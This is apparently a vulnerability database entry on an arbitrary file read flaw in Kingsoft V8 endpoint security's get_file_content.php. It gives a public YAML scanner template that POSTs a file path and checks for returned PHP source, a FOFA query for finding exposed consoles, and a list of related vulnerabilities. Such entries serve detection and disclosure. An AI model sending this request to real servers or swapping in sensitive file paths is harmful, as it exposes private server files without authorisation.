kingsoft-v8-get-file-content-file-read: 金山 V8 终端安全系统 get_file_content.php 任意文件读取漏洞

漏洞描述

PoC代码[已公开]

id: kingsoft-v8-get-file-content-file-read

info:
  name: 金山 V8 终端安全系统 get_file_content.php 任意文件读取漏洞
  author: zan8in
  severity: high
  verified: false
  description: |-
    金山 V8 终端安全系统 存在任意文件读取漏洞，攻击者可以通过漏洞下载服务器任意文件
    fofa: title="在线安装-V8+终端安全系统Web控制台"
  tags: kingsoft,file-read
  created: 2023/10/13

rules:
  r0:
    request:
      method: POST
      path: /receive_file/get_file_content.php
      body: filepath=login.php
    expression: response.status == 200 && response.body.bcontains(b'<?php') && response.body.bcontains(b'"public/common.php"') && response.body.bcontains(b'HTTP_ACCEPT_LANGUAGE')
expression: r0()

相关漏洞推荐

• WordPress Google for WooCommerce /wp-content/plugins/google-listings-and-ads/vendor/googleads/google-ads-php/scripts/print_php_information.php 信息泄露漏洞（CVE-2024-10486）
• Trinity Audio /wp-content/plugins/trinity-audio/admin/inc/phpinfo.php 信息泄露漏洞（CVE-2025-9196）
• cellinxnvt-getfilecontent-cgi-fileread: Cellinx NVT - GetFileContent.cgi - FileRead
• eaa-fileread: EAA 益和应用接入系统任意文件读取
• esafenet-sql-mysql-fileread: 亿赛通未授权文件下载
• h3c-mselfservice-dynamiccontent-properties-rce: H3C 用户自助服务平台 dynamiccontent.properties.xhtml RCE 漏洞
• huatiandongli-ntkodownload-fileread: 华天动力 ntkoDownload 任意文件读取
• huatiandongli-templateservice-fileread: 华天动力 ntkoDownload 任意文件读取
• huijietong-cloud-fileread: Huijietong Cloud File Read
• mapgis-cloud-manager-local-file-read: MapGis Cloud Manager Local File Read
• qibo-cms-job-file-read: Qibo CMS Job File Read
• sangfor-reporter-anyfileread: Sangfor reporter 任意文件读取
• solr-file-read: Apache Solr <= 8.8.1 Arbitrary File Read